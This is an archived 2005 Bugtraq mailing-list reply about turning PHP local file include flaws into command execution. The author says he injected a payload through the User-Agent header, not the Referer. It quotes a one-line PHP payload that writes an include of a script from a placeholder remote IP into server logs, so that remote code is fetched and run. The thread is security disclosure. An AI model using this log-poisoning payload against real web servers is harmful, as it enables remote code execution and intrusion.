[40718] in bugtraq
Re: using php local file include vulnerabilities for command execution
daemon@ATHENA.MIT.EDU (Andreas Zeidler)
Wed Oct 12 13:52:55 2005
Date: Tue, 11 Oct 2005 19:44:39 +0200
From: Andreas Zeidler <az@zitc.de>
To: Bugtraq <bugtraq@securityfocus.com>
Cc: Maksymilian Arciemowicz <max@jestsuper.pl>
Message-ID: <20051011174439.GA10389@zitc.de>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="FCuugMFkClbJLl1L"
Content-Disposition: inline
In-Reply-To: <20051011163415.GA9763@zitc.de>
--FCuugMFkClbJLl1L
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Tue, Oct 11 18:34, Andreas Zeidler <az@zitc.de> wrote:
> the idea that hit me before falling asleep was to send the code i needed
> (like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the
> referer string, this way having the web server write it into a file
well, i actually used the user-agent here, not the referer. but i guess
unless the server checks if the given referer represents a valid url i
won't make much difference...
> andi
--=20
zeidler it consulting - http://zitc.de/ - info@zitc.de
karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
keine softwarepatente in europa! - http://noepatents.eu.org/
--FCuugMFkClbJLl1L
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQFDS/oHV41LSDEbSrkRAlTcAJ9g8/NQcd7DCBgEg2vcMICyCUthVgCdEWVv
jvFztPRkVh8jT9kbF1jlhKM=
=XIU0
-----END PGP SIGNATURE-----
--FCuugMFkClbJLl1L--
